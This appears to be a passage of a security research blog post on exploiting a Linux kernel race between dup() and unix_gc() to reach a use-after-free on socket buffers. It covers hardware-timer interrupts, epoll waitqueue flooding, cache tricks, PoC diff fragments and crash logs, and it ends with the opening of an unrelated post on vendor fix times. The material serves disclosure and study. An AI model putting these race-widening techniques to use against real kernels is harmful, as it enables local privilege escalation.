In this race window, the file descriptor must be closed (to drop the FD's reference to the file) and a unix_gc() run must get past the point where it checks the file's refcount ("total_refs = file_count(u->sk.sk_socket->file)").

In the Debian 5.10.0-9-amd64 kernel at version 5.10.70-1, that race window looks as follows:

<__fget_files+0x1e> cmp    r10,rax

<__fget_files+0x21> sbb    rax,rax

<__fget_files+0x24> mov    rdx,QWORD PTR [r11+0x8]

<__fget_files+0x28> and    eax,r8d

<__fget_files+0x2b> lea    rax,[rdx+rax*8]

<__fget_files+0x2f> mov    r12,QWORD PTR [rax] ; RACE WINDOW START

; r12 now contains file*

<__fget_files+0x32> test   r12,r12

<__fget_files+0x35> je     ffffffff812e3df7 <__fget_files+0x77>

<__fget_files+0x37> mov    eax,r9d

<__fget_files+0x3a> and    eax,DWORD PTR [r12+0x44] ; LOAD (for ->f_mode)

<__fget_files+0x3f> jne    ffffffff812e3df7 <__fget_files+0x77>

<__fget_files+0x41> mov    rax,QWORD PTR [r12+0x38] ; LOAD (for ->f_count)

<__fget_files+0x46> lea    rdx,[r12+0x38]

<__fget_files+0x4b> test   rax,rax

<__fget_files+0x4e> je     ffffffff812e3def <__fget_files+0x6f>

<__fget_files+0x50> lea    rcx,[rsi+rax*1]

<__fget_files+0x54> lock cmpxchg QWORD PTR [rdx],rcx ; RACE WINDOW END (on cmpxchg success)

As you can see, the race window is fairly small - around 12 instructions, assuming that the cmpxchg succeeds.

Missing some cache

Luckily for us, the race window contains the first few memory accesses to the struct file; therefore, by making sure that the struct file is not present in the fastest CPU caches, we can widen the race window by as much time as the memory accesses take. The standard way to do this is to use an eviction pattern / eviction set; but instead we can also make the cache line dirty on another core (see Anders Fogh's blogpost for more detail). (I'm not actually sure about the intricacies of how much latency this adds on different manufacturers' CPU cores, or on different CPU generations - I've only tested different versions of my proof-of-concept on Intel Skylake and Tiger Lake. Differences in cache coherency protocols or snooping might make a big difference.)

For the cache line containing the flags and refcount of a struct file, this can be done by, on another CPU, temporarily bumping its refcount up and then changing it back down, e.g. with close(dup(fd)) (or just by accessing the FD in pretty much any way from a multithreaded process).

However, when we're trying to hit the race in __fget_files() via dup(), we don't want any cache misses to occur before we hit the race window - that would slow us down and probably make us miss the race. To prevent that from happening, we can call dup() with a different FD number for a warm-up run shortly before attempting the race. Because we also want the relevant cache line in the FD table to be hot, we should choose the FD number for the warm-up run such that it uses the same cache line of the file descriptor table.

An interruption

Okay, a cache miss might be something like a few dozen or maybe hundred nanoseconds or so - that's better, but it's not great. What else can we do to make this tiny piece of code much slower to execute?

On Android, kernels normally set CONFIG_PREEMPT, which would've allowed abusing the scheduler to somehow interrupt the execution of this code. The way I've done this in the past was to give the victim thread a low scheduler priority and pin it to a specific CPU core together with another high-priority thread that is blocked on a read() syscall on an empty pipe (or eventfd); when data is written to the pipe from another CPU core, the pipe becomes readable, so the high-priority thread (which is registered on the pipe's waitqueue) becomes schedulable, and an inter-processor interrupt (IPI) is sent to the victim's CPU core to force it to enter the scheduler immediately.

One problem with that approach, aside from its reliance on CONFIG_PREEMPT, is that any timing variability in the kernel code involved in sending the IPI makes it harder to actually preempt the victim thread in the right spot.

(Thanks to the Xen security team - I think the first time I heard the idea of using an interrupt to widen a race window might have been from them.)

Setting an alarm

A better way to do this on an Android phone would be to trigger the scheduler not from an IPI, but from an expiring high-resolution timer on the same core, although I didn't get it to work (probably because my code was broken in unrelated ways).

High-resolution timers (hrtimers) are exposed through many userspace APIs. Even the timeout of select()/pselect() uses an hrtimer, although this is an hrtimer that normally has some slack applied to it to allow batching it with timers that are scheduled to expire a bit later. An example of a non-hrtimer-based API is the timeout used for reading from a UNIX domain socket (and probably also other types of sockets?), which can be set via SO_RCVTIMEO.

The thing that makes hrtimers "high-resolution" is that they don't just wait for the next periodic clock tick to arrive; instead, the expiration time of the next hrtimer on the CPU core is programmed into a hardware timer. So we could set an absolute hrtimer for some time in the future via something like timer_settime() or timerfd_settime(), and then at exactly the programmed time, the hardware will raise an interrupt! We've made the timing behavior of the OS irrelevant for the second side of the race, the only thing that matters is the hardware! Or... well, almost...

[Sidenote] Absolute timers: Not quite absolute

So we pick some absolute time at which we want to be interrupted, and tell the kernel using a syscall that accepts an absolute time, in nanoseconds. And then when that timer is the next one scheduled, the OS converts the absolute time to whatever clock base/scale the hardware timer is based on, and programs it into hardware. And the hardware usually supports programming timers with absolute time - e.g. on modern X86 (with X86_FEATURE_TSC_DEADLINE_TIMER), you can simply write an absolute Time Stamp Counter(TSC) deadline into MSR_IA32_TSC_DEADLINE, and when that deadline is reached, you get an interrupt. The situation on arm64 is similar, using the timer's comparator register (CVAL).

However, on both X86 and arm64, even though the clockevent subsystem is theoretically able to give absolute timestamps to clockevent drivers (via ->set_next_ktime()), the drivers instead only implement ->set_next_event(), which takes a relative time as argument. This means that the absolute timestamp has to be converted into a relative one, only to be converted back to absolute a short moment later. The delay between those two operations is essentially added to the timer's expiration time.

Luckily this didn't really seem to be a problem for me; if it was, I would have tried to repeatedly call timerfd_settime() shortly before the planned expiry time to ensure that the last time the hardware timer is programmed, the relevant code path is hot in the caches. (I did do some experimentation on arm64, where this seemed to maybe help a tiny bit, but I didn't really analyze it properly.)

A really big list of things to do

Okay, so all the stuff I said above would be helpful on an Android phone with CONFIG_PREEMPT, but what if we're trying to target a normal desktop/server kernel that doesn't have that turned on?

Well, we can still trigger hrtimer interrupts the same way - we just can't use them to immediately enter the scheduler and preempt the thread anymore. But instead of using the interrupt for preemption, we could just try to make the interrupt handler run for a really long time.

Linux has the concept of a "timerfd", which is a file descriptor that refers to a timer. You can e.g. call read() on a timerfd, and that operation will block until the timer has expired. Or you can monitor the timerfd using epoll, and it will show up as readable when the timer expires.

When a timerfd becomes ready, all the timerfd's waiters (including epoll watches), which are queued up in a linked list, are woken up via the wake_up() path - just like when e.g. a pipe becomes readable. Therefore, if we can make the list of waiters really long, the interrupt handler will have to spend a lot of time iterating over that list.

And for any waitqueue that is wired up to a file descriptor, it is fairly easy to add a ton of entries thanks to epoll. Epoll ties its watches to specific FD numbers, so if you duplicate an FD with hundreds of dup() calls, you can then use a single epoll instance to install hundreds of waiters on the file. Additionally, a single process can have lots of epoll instances. I used 500 epoll instances and 100 duplicate FDs, resulting in 50 000 waitqueue items.

Measuring race outcomes

A nice aspect of this race condition is that if you only hit the difficult race (close() the FD and run unix_gc() while dup() is preempted between FD table lookup and refcount increment), no memory corruption happens yet, but you can observe that the GC has incorrectly removed a socket buffer (SKB) from the victim socket. Even better, if the race fails, you can also see in which direction it failed, as long as no FDs below the victim FD are unused:

  • If dup() returns -1, it was called too late / the interrupt happened too soon: The file* was already gone from the FD table when __fget_files() tried to load it.
  • If dup() returns a file descriptor:
  • If it returns an FD higher than the victim FD, this implies that the victim FD was only closed after dup() had already elevated the refcount and allocated a new FD. This means dup() was called too soon / the interrupt happened too late.
  • If it returns the old victim FD number:
  • If recvmsg() on the FD returned by dup() returns no data, it means the race succeeded: The GC wrongly removed the queued SKB.
  • If recvmsg() returns data, the interrupt happened between the refcount increment and the allocation of a new FD. dup() was called a little bit too soon / the interrupt happened a little bit too late.

Based on this, I repeatedly tested different timing offsets, using a spinloop with a variable number of iterations to skew the timing, and plotted what outcomes the race attempts had depending on the timing skew.

Results: Debian kernel, on Tiger Lake

I tested this on a Tiger Lake laptop, with the same kernel as shown in the disassembly. Note that "0" on the X axis is offset -300 ns relative to the timer's programmed expiry.

This graph shows histograms of race attempt outcomes (too early, success, or too late), with the timing offset at which the outcome occurred on the X axis. The graph shows that depending on the timing offset, up to around 1/3 of race attempts succeeded.

Results: Other kernel, on Skylake

This graph shows similar histograms for a Skylake processor. The exact distribution is different, but again, depending on the timing offset, around 1/3 of race attempts succeeded.

These measurements are from an older laptop with a Skylake CPU, running a different kernel. Here "0" on the X axis is offset -1 us relative to the timer. (These timings are from a system that's running a different kernel from the one shown above, but I don't think that makes a difference.)

The exact timings of course look different between CPUs, and they probably also change based on CPU frequency scaling? But still, if you know what the right timing is (or measure the machine's timing before attempting to actually exploit the bug), you could hit this narrow race with a success rate of about 30%!

How important is the cache miss?

The previous section showed that with the right timing, the race succeeds with a probability around 30% - but it doesn't show whether the cache miss is actually important for that, or whether the race would still work fine without it. To verify that, I patched my test code to try to make the file's cache line hot (present in the cache) instead of cold (not present in the cache):

@@ -312,8 +312,10 @@

     }

 

+#if 0

     // bounce socket's file refcount over to other cpu

     pin_to(2);

     close(SYSCHK(dup(RESURRECT_FD+1-1)));

     pin_to(1);

+#endif

 

     //printf("setting timer\n");

@@ -352,5 +354,5 @@

     close(loop_root);

     while (ts_is_in_future(spin_stop))

-      close(SYSCHK(dup(FAKE_RESURRECT_FD)));

+      close(SYSCHK(dup(RESURRECT_FD)));

     while (ts_is_in_future(my_launch_ts)) /*spin*/;

With that patch, the race outcomes look like this on the Tiger Lake laptop:

This graph is a histogram of race outcomes depending on timing offset; it looks similar to the previous graphs, except that almost no race attempts succeed anymore.

But wait, those graphs make no sense!

If you've been paying attention, you may have noticed that the timing graphs I've been showing are really weird. If we were deterministically hitting the race in exactly the same way every time, the timing graph should look like this (looking just at the "too-early" and "too-late" cases for simplicity):

A sketch of a histogram of race outcomes where the "too early" outcome suddenly drops from 100% probability to 0% probability, and a bit afterwards, the "too late" outcome jumps from 0% probability to 100%

Sure, maybe there is some microarchitectural state that is different between runs, causing timing variations - cache state, branch predictor state, frequency scaling, or something along those lines -, but a small number of discrete events that haven't been accounted for should be adding steps to the graph. (If you're mathematically inclined, you can model that as the result of a convolution of the ideal timing graph with the timing delay distributions of individual discrete events.) For two unaccounted events, that might look like this:

A sketch of a histogram of race outcomes where the "too early" outcome drops from 100% probability to 0% probability in multiple discrete steps, and overlapping that, the "too late" outcome goes up from 0% probability to 100% in multiple discrete steps

But what the graphs are showing is more of a smooth, linear transition, like this:

A sketch of a histogram of race outcomes where the "too early" outcome's share linearly drops while the "too late" outcome's share linearly rises

And that seems to me like there's still something fundamentally wrong. Sure, if there was a sufficiently large number of discrete events mixed together, the curve would eventually just look like a smooth smear - but it seems unlikely to me that there is such a large number of somewhat-evenly distributed random discrete events. And sure, we do get a small amount of timing inaccuracy from sampling the clock in a spinloop, but that should be bounded to the execution time of that spinloop, and the timing smear is far too big for that.

So it looks like there is a source of randomness that isn't a discrete event, but something that introduces a random amount of timing delay within some window. So I became suspicious of the hardware timer. The kernel is using MSR_IA32_TSC_DEADLINE, and the Intel SDM tells us that that thing is programmed with a TSC value, which makes it look as if the timer has very high granularity. But MSR_IA32_TSC_DEADLINE is a newer mode of the LAPIC timer, and the older LAPIC timer modes were instead programmed in units of the APIC timer frequency. According to the Intel SDM, Volume 3A, section 10.5.4 "APIC Timer", that is "the processor’s bus clock or core crystal clock frequency (when TSC/core crystal clock ratio is enumerated in CPUID leaf 0x15) divided by the value specified in the divide configuration register". This frequency is significantly lower than the TSC frequency. So perhaps MSR_IA32_TSC_DEADLINE is actually just a front-end to the same old APIC timer?

I tried to measure the difference between the programmed TSC value and when execution was actually interrupted (not when the interrupt handler starts running, but when the old execution context is interrupted - you can measure that if the interrupted execution context is just running RDTSC in a loop); that looks as follows:

A graph showing noise. Delays from deadline TSC to last successful TSC read before interrupt look essentially random, in the range from around -130 to around 10.

As you can see, the expiry of the hardware timer indeed adds a bunch of noise. The size of the timing difference is also very close to the crystal clock frequency - the TSC/core crystal clock ratio on this machine is 117. So I tried plotting the absolute TSC values at which execution was interrupted, modulo the TSC / core crystal clock ratio, and got this:

A graph showing a clear grouping around 0, roughly in the range -20 to 10, with some noise scattered over the rest of the graph.

This confirms that MSR_IA32_TSC_DEADLINE is (apparently) an interface that internally converts the specified TSC value into less granular bus clock / core crystal clock time, at least on some Intel CPUs.

But there's still something really weird here: The TSC values at which execution seems to be interrupted were at negative offsets relative to the programmed expiry time, as if the timeouts were rounded down to the less granular clock, or something along those lines. To get a better idea of how timer interrupts work, I measured on yet another system (an old Haswell CPU) with a patched kernel when execution is interrupted and when the interrupt handler starts executing relative to the programmed expiry time (and also plotted the difference between the two):

A graph showing that the skid from programmed interrupt time to execution interruption is around -100 to -30 cycles, the skid to interrupt entry is around 360 to 420 cycles, and the time from execution interruption to interrupt entry has much less timing variance and is at around 440 cycles.

So it looks like the CPU starts handling timer interrupts a little bit before the programmed expiry time, but interrupt handler entry takes so long (~450 TSC clock cycles?) that by the time the CPU starts executing the interrupt handler, the timer expiry time has long passed.

Anyway, the important bit for us is that when the CPU interrupts execution due to timer expiry, it's always at a LAPIC timer edge; and LAPIC timer edges happen when the TSC value is a multiple of the TSC/LAPIC clock ratio. An exploit that doesn't take that into account and wrongly assumes that MSR_IA32_TSC_DEADLINE has TSC granularity will have its timing smeared by one LAPIC clock period, which can be something like 40ns.

The ~30% accuracy we could achieve with the existing PoC with the right timing is already not terrible; but if we control for the timer's weirdness, can we do better?

The problem is that we are effectively launching the race with two timers that behave differently: One timer based on calling clock_gettime() in a loop (which uses the high-resolution TSC to compute a time), the other a hardware timer based on the lower-resolution LAPIC clock. I see two options to fix this:

  1. Try to ensure that the second timer is set at the start of a LAPIC clock period - that way, the second timer should hopefully behave exactly like the first (or have an additional fixed offset, but we can compensate for that).
  2. Shift the first timer's expiry time down according to the distance from the second timer to the previous LAPIC clock period.

(One annoyance with this is that while we can grab information on how wall/monotonic time is calculated from TSC from the vvar mapping used by the vDSO, the clock is subject to minuscule additional corrections at every clock tick, which occur every 4ms on standard distro kernels (with CONFIG_HZ=250) as long as any core is running.)

I tried to see whether the timing graph would look nicer if I accounted for this LAPIC clock rounding and also used a custom kernel to cheat and control for possible skid introduced by the absolute-to-relative-and-back conversion of the expiry time (see further up), but that still didn't help all that much.

(No) surprise: clock speed matters

Something I should've thought about way earlier is that of course, clock speed matters. On newer Intel CPUs with P-states, the CPU is normally in control of its own frequency, and dynamically adjusts it as it sees fit; the OS just provides some hints.

Linux has an interface that claims to tell you the "current frequency" of each CPU core in /sys/devices/system/cpu/cpufreq/policy<n>/scaling_cur_freq, but when I tried using that, I got a different "frequency" every time I read that file, which seemed suspicious.

Looking at the implementation, it turns out that the value shown there is calculated in arch_freq_get_on_cpu() and its callees - the value is calculated on demand when the file is read, with results cached for around 10 milliseconds. The value is determined as the ratio between the deltas of MSR_IA32_APERF and MSR_IA32_MPERF between the last read and the current one. So if you have some tool that is polling these values every few seconds and wants to show average clock frequency over that time, it's probably a good way of doing things; but if you actually want the current clock frequency, it's not a good fit.

I hacked a helper into my kernel that samples both MSRs twice in quick succession, and that gives much cleaner results. When I measure the clock speeds and timing offsets at which the race succeeds, the result looks like this (showing just two clock speeds; the Y axis is the number of race successes at the clock offset specified on the X axis and the frequency scaling specified by the color):

A graph showing that the timing of successful race attempts depends on the CPU's performance setting - at 11/28 performance, most successful race attempts occur around clock offset -1200 (in TSC units), while at 14/28 performance, most successful race attempts occur around clock offset -1000.

So clearly, dynamic frequency scaling has a huge impact on the timing of the race - I guess that's to be expected, really.

But even accounting for all this, the graph still looks kind of smooth, so clearly there is still something more that I'm missing - oh well. I decided to stop experimenting with the race's timing at this point, since I didn't want to sink too much time into it. (Or perhaps I actually just stopped because I got distracted by newer and shinier things?)

Causing a UAF

Anyway, I could probably spend much more time trying to investigate the timing variations (and probably mostly bang my head against a wall because details of execution timing are really difficult to understand in detail, and to understand it completely, it might be necessary to use something like Gamozo Labs' "Sushi Roll" and then go through every single instruction in detail and compare the observations to the internal architecture of the CPU). Let's not do that, and get back to how to actually exploit this bug!

To turn this bug into memory corruption, we have to abuse that the recvmsg() path assumes that SKBs on the receive queue are protected from deletion by the socket mutex while the GC actually deletes SKBs from the receive queue without touching the socket mutex. For that purpose, while the unix GC is running, we have to start a recvmsg() call that looks up the victim SKB, block until the unix GC has freed the SKB, and then let recvmsg() continue operating on the freed SKB. This is fairly straightforward - while it is a race, we can easily slow down unix_gc() for multiple milliseconds by creating lots of sockets that are not directly referenced from the FD table and have many tiny SKBs queued up - here's a graph showing the unix GC execution time on my laptop, depending on the number of queued SKBs that the GC has to scan through:

A graph showing the time spent per GC run depending on the number of queued SKBs. The relationship is roughly linear.

To turn this into a UAF, it's also necessary to get past the following check near the end of unix_gc():

       /* All candidates should have been detached by now. */

        BUG_ON(!list_empty(&gc_candidates));

gc_candidates is a list that previously contained all sockets that were deemed to be unreachable by the GC. Then, the GC attempted to free all those sockets by eliminating their mutual references. If we manage to keep a reference to one of the sockets that the GC thought was going away, the GC detects that with the BUG_ON().

But we don't actually need the victim SKB to reference a socket that the GC thinks is going away; in scan_inflight(), the GC targets any SKB with a socket that is marked UNIX_GC_CANDIDATE, meaning it just had to be a candidate for being scanned by the GC. So by making the victim SKB hold a reference to a socket that is not directly referenced from a file descriptor table, but is indirectly referenced by a file descriptor table through another socket, we can ensure that the BUG_ON() won't trigger.

I extended my reproducer with this trick and some userfaultfd trickery to make recv() run with the right timing. Nowadays you don't necessarily get full access to userfaultfd as a normal user, but since I'm just trying to show the concept, and there are alternatives to userfaultfd (using FUSE or just slow disk access), that's good enough for this blogpost.

When a normal distro kernel is running normally, the UAF reproducer's UAF accesses won't actually be noticeable; but if you add the kernel command line flag slub_debug=FP (to enable SLUB's poisoning and sanity checks), the reproducer quickly crashes twice, first with a poison dereference and then a poison overwrite detection, showing that one byte of the poison was incremented:

general protection fault, probably for non-canonical address 0x6b6b6b6b6b6b6b6b: 0000 [#1] SMP NOPTI

CPU: 1 PID: 2655 Comm: hardirq_loop Not tainted 5.10.0-9-amd64 #1 Debian 5.10.70-1

[...]

RIP: 0010:unix_stream_read_generic+0x72b/0x870

Code: fe ff ff 31 ff e8 85 87 91 ff e9 a5 fe ff ff 45 01 77 44 8b 83 80 01 00 00 85 c0 0f 89 10 01 00 00 49 8b 47 38 48 85 c0 74 23 <0f> bf 00 66 85 c0 0f 85 20 01 00 00 4c 89 fe 48 8d 7c 24 58 44 89

RSP: 0018:ffffb789027f7cf0 EFLAGS: 00010202

RAX: 6b6b6b6b6b6b6b6b RBX: ffff982d1d897b40 RCX: 0000000000000000

RDX: 6a0fe1820359dce8 RSI: ffffffffa81f9ba0 RDI: 0000000000000246

RBP: ffff982d1d897ea8 R08: 0000000000000000 R09: 0000000000000000

R10: 0000000000000000 R11: ffff982d2645c900 R12: ffffb789027f7dd0

R13: ffff982d1d897c10 R14: 0000000000000001 R15: ffff982d3390e000

FS:  00007f547209d740(0000) GS:ffff98309fa40000(0000) knlGS:0000000000000000

CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033

CR2: 00007f54722cd000 CR3: 00000001b61f4002 CR4: 0000000000770ee0

PKRU: 55555554

Call Trace:

[...]

 unix_stream_recvmsg+0x53/0x70

[...]

 __sys_recvfrom+0x166/0x180

[...]

 __x64_sys_recvfrom+0x25/0x30

 do_syscall_64+0x33/0x80

 entry_SYSCALL_64_after_hwframe+0x44/0xa9

[...]

---[ end trace 39a81eb3a52e239c ]---

=============================================================================

BUG skbuff_head_cache (Tainted: G      D          ): Poison overwritten

-----------------------------------------------------------------------------

INFO: 0x00000000d7142451-0x00000000d7142451 @offset=68. First byte 0x6c instead of 0x6b

INFO: Slab 0x000000002f95c13c objects=32 used=32 fp=0x0000000000000000 flags=0x17ffffc0010200

INFO: Object 0x00000000ef9c59c8 @offset=0 fp=0x00000000100a3918

Object   00000000ef9c59c8: 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b  kkkkkkkkkkkkkkkk

Object   0000000097454be8: 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b  kkkkkkkkkkkkkkkk

Object   0000000035f1d791: 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b  kkkkkkkkkkkkkkkk

Object   00000000af71b907: 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b  kkkkkkkkkkkkkkkk

Object   000000000d2d371e: 6b 6b 6b 6b 6c 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b  kkkklkkkkkkkkkkk

Object   0000000000744b35: 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b  kkkkkkkkkkkkkkkk

Object   00000000794f2935: 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b  kkkkkkkkkkkkkkkk

Object   000000006dc06746: 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b  kkkkkkkkkkkkkkkk

Object   000000005fb18682: 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b  kkkkkkkkkkkkkkkk

Object   0000000072eb8dd2: 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b  kkkkkkkkkkkkkkkk

Object   00000000b5b572a9: 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b  kkkkkkkkkkkkkkkk

Object   0000000085d6850b: 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b  kkkkkkkkkkkkkkkk

Object   000000006346150b: 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b  kkkkkkkkkkkkkkkk

Object   000000000ddd1ced: 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b a5  kkkkkkkkkkkkkkk.

Padding  00000000e00889a7: 5a 5a 5a 5a 5a 5a 5a 5a 5a 5a 5a 5a 5a 5a 5a 5a  ZZZZZZZZZZZZZZZZ

Padding  00000000d190015f: 5a 5a 5a 5a 5a 5a 5a 5a                          ZZZZZZZZ

CPU: 7 PID: 1641 Comm: gnome-shell Tainted: G    B D           5.10.0-9-amd64 #1 Debian 5.10.70-1

[...]

Call Trace:

 dump_stack+0x6b/0x83

 check_bytes_and_report.cold+0x79/0x9a

 check_object+0x217/0x260

[...]

 alloc_debug_processing+0xd5/0x130

 ___slab_alloc+0x511/0x570

[...]

 __slab_alloc+0x1c/0x30

 kmem_cache_alloc_node+0x1f3/0x210

 __alloc_skb+0x46/0x1f0

 alloc_skb_with_frags+0x4d/0x1b0

 sock_alloc_send_pskb+0x1f3/0x220

[...]

 unix_stream_sendmsg+0x268/0x4d0

 sock_sendmsg+0x5e/0x60

 ____sys_sendmsg+0x22e/0x270

[...]

 ___sys_sendmsg+0x75/0xb0

[...]

 __sys_sendmsg+0x59/0xa0

 do_syscall_64+0x33/0x80

 entry_SYSCALL_64_after_hwframe+0x44/0xa9

[...]

FIX skbuff_head_cache: Restoring 0x00000000d7142451-0x00000000d7142451=0x6b

FIX skbuff_head_cache: Marking all objects used

RIP: 0010:unix_stream_read_generic+0x72b/0x870

Code: fe ff ff 31 ff e8 85 87 91 ff e9 a5 fe ff ff 45 01 77 44 8b 83 80 01 00 00 85 c0 0f 89 10 01 00 00 49 8b 47 38 48 85 c0 74 23 <0f> bf 00 66 85 c0 0f 85 20 01 00 00 4c 89 fe 48 8d 7c 24 58 44 89

RSP: 0018:ffffb789027f7cf0 EFLAGS: 00010202

RAX: 6b6b6b6b6b6b6b6b RBX: ffff982d1d897b40 RCX: 0000000000000000

RDX: 6a0fe1820359dce8 RSI: ffffffffa81f9ba0 RDI: 0000000000000246

RBP: ffff982d1d897ea8 R08: 0000000000000000 R09: 0000000000000000

R10: 0000000000000000 R11: ffff982d2645c900 R12: ffffb789027f7dd0

R13: ffff982d1d897c10 R14: 0000000000000001 R15: ffff982d3390e000

FS:  00007f547209d740(0000) GS:ffff98309fa40000(0000) knlGS:0000000000000000

CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033

CR2: 00007f54722cd000 CR3: 00000001b61f4002 CR4: 0000000000770ee0

PKRU: 55555554

Conclusion(s)

Hitting a race can become easier if, instead of racing two threads against each other, you race one thread against a hardware timer to create a gigantic timing window for the other thread. Hence the title! On the other hand, it introduces extra complexity because now you have to think about how timers actually work, and turns out, time is a complicated concept...

This shows how at least some really tight races can still be hit and we should treat them as security bugs, even if it seems like they'd be very hard to hit at first glance.

Also, precisely timing races is hard, and the details of how long it actually takes the CPU to get from one point to another are mysterious. (As not only exploit writers know, but also anyone who's ever wanted to benchmark a performance-relevant change...)

Appendix: How impatient are interrupts?

I did also play around with this stuff on arm64 a bit, and I was wondering: At what points do interrupts actually get delivered? Does an incoming interrupt force the CPU to drop everything immediately, or do inflight operations finish first? This gets particularly interesting on phones that contain two or three different types of CPUs mixed together.

On a Pixel 4 (which has 4 slow in-order cores, 3 fast cores, and 1 faster core), I tried firing an interval timer at 100Hz (using timer_create()), with a signal handler that logs the PC register, while running this loop:

  400680:        91000442         add        x2, x2, #0x1

  400684:        91000421         add        x1, x1, #0x1

  400688:        9ac20820         udiv        x0, x1, x2

  40068c:        91006800         add        x0, x0, #0x1a

  400690:        91000400         add        x0, x0, #0x1

  400694:        91000442         add        x2, x2, #0x1

  400698:        91000421         add        x1, x1, #0x1

  40069c:        91000442         add        x2, x2, #0x1

  4006a0:        91000421         add        x1, x1, #0x1

  4006a4:        9ac20820         udiv        x0, x1, x2

  4006a8:        91006800         add        x0, x0, #0x1a

  4006ac:        91000400         add        x0, x0, #0x1

  4006b0:        91000442         add        x2, x2, #0x1

  4006b4:        91000421         add        x1, x1, #0x1

  4006b8:        91000442         add        x2, x2, #0x1

  4006bc:        91000421         add        x1, x1, #0x1

  4006c0:        17fffff0         b        400680 <main+0xe0>

The logged interrupt PCs had the following distribution on a slow in-order core:

A histogram of PC register values, where most instructions in the loop have roughly equal frequency, the instructions after udiv instructions have twice the frequency, and two other instructions have zero frequency.

and this distribution on a fast out-of-order core:

A histogram of PC register values, where the first instruction of the loop has very high frequency, the following 4 instructions have near-zero frequency, and the following instructions have low frequencies

As always, out-of-order (OOO) cores make everything weird, and the start of the loop seems to somehow "provide cover" for the following instructions; but on the in-order core, we can see that more interrupts arrive after the slow udiv instructions. So apparently, when one of those is executing while an interrupt arrives, it continues executing and doesn't get aborted somehow?

With the following loop, which has a LDR instruction mixed in that accesses a memory location that is constantly being modified by another thread:

  4006a0:        91000442         add        x2, x2, #0x1

  4006a4:        91000421         add        x1, x1, #0x1

  4006a8:        9ac20820         udiv        x0, x1, x2

  4006ac:        91006800         add        x0, x0, #0x1a

  4006b0:        91000400         add        x0, x0, #0x1

  4006b4:        91000442         add        x2, x2, #0x1

  4006b8:        91000421         add        x1, x1, #0x1

  4006bc:        91000442         add        x2, x2, #0x1

  4006c0:        91000421         add        x1, x1, #0x1

  4006c4:        9ac20820         udiv        x0, x1, x2

  4006c8:        91006800         add        x0, x0, #0x1a

  4006cc:        91000400         add        x0, x0, #0x1

  4006d0:        91000442         add        x2, x2, #0x1

  4006d4:        f9400061         ldr        x1, [x3]

  4006d8:        91000421         add        x1, x1, #0x1

  4006dc:        91000442         add        x2, x2, #0x1

  4006e0:        91000421         add        x1, x1, #0x1

  4006e4:        17ffffef         b        4006a0 <main+0x100>

the cache-missing loads obviously have a large influence on the timing. On the in-order core:

A histogram of interrupt instruction pointers, showing that most interrupts are delivered with PC pointing to the instruction after the high-latency load instruction.

On the OOO core:

A similar histogram as the previous one, except that an even larger fraction of interrupt PCs are after the high-latency load instruction.

What is interesting to me here is that the timer interrupts seem to again arrive after the slow load - implying that if an interrupt arrives while a slow memory access is in progress, the interrupt handler may not get to execute until the memory access has finished? (Unless maybe on the OOO core the interrupt handler can start speculating already? I wouldn't really expect that, but could imagine it.)

On an X86 Skylake CPU, we can do a similar test:

    11b8:        48 83 c3 01                  add    $0x1,%rbx

    11bc:        48 83 c0 01                  add    $0x1,%rax

    11c0:        48 01 d8                     add    %rbx,%rax

    11c3:        48 83 c3 01                  add    $0x1,%rbx

    11c7:        48 83 c0 01                  add    $0x1,%rax

    11cb:        48 01 d8                     add    %rbx,%rax

    11ce:        48 03 02                     add    (%rdx),%rax

    11d1:        48 83 c0 01                  add    $0x1,%rax

    11d5:        48 83 c3 01                  add    $0x1,%rbx

    11d9:        48 01 d8                     add    %rbx,%rax

    11dc:        48 83 c3 01                  add    $0x1,%rbx

    11e0:        48 83 c0 01                  add    $0x1,%rax

    11e4:        48 01 d8                     add    %rbx,%rax

    11e7:        eb cf                        jmp    11b8 <main+0xf8>

with a similar result:

A histogram of interrupt instruction pointers, showing that almost all interrupts were delivered with RIP pointing to the instruction after the high-latency load.

This means that if the first access to the file terminated our race window (which is not the case), we probably wouldn't be able to win the race by making the access to the file slow - instead we'd have to slow down one of the operations before that. (But note that I have only tested simple loads, not stores or read-modify-write operations here.)

A walk through Project Zero metrics

By: Ryan
10 February 2022 at 16:58

Posted by Ryan Schoen, Project Zero

tl;dr

  • In 2021, vendors took an average of 52 days to fix security vulnerabilities reported from Project Zero. This is a significant acceleration from an average of about 80 days 3 years ago.
  • In addition to the average now being well below the 90-day deadline, we have also seen a dropoff in vendors missing the deadline (or the additional 14-day grace period). In 2021, only one bug exceeded its fix deadline, though 14% of bugs required the grace period.
  • Differences in the amount of time it takes a vendor/product to ship a fix to users reflects their product design, development practices, update cadence, and general processes towards security reports. We hope that this comparison can showcase best practices, and encourage vendors to experiment with new policies.
  • This data aggregation and analysis is relatively new for Project Zero, but we hope to do it more in the future. We encourage all vendors to consider publishing aggregate data on their time-to-fix and time-to-patch for externally reported vulnerabilities, as well as more data sharing and transparency in general.

Overview

For nearly ten years, Google’s Project Zero has been working to make it more difficult for bad actors to find and exploit security vulnerabilities, significantly improving the security of the Internet for everyone. In that time, we have partnered with folks across industry to transform the way organizations prioritize and approach fixing security vulnerabilities and updating people’s software.

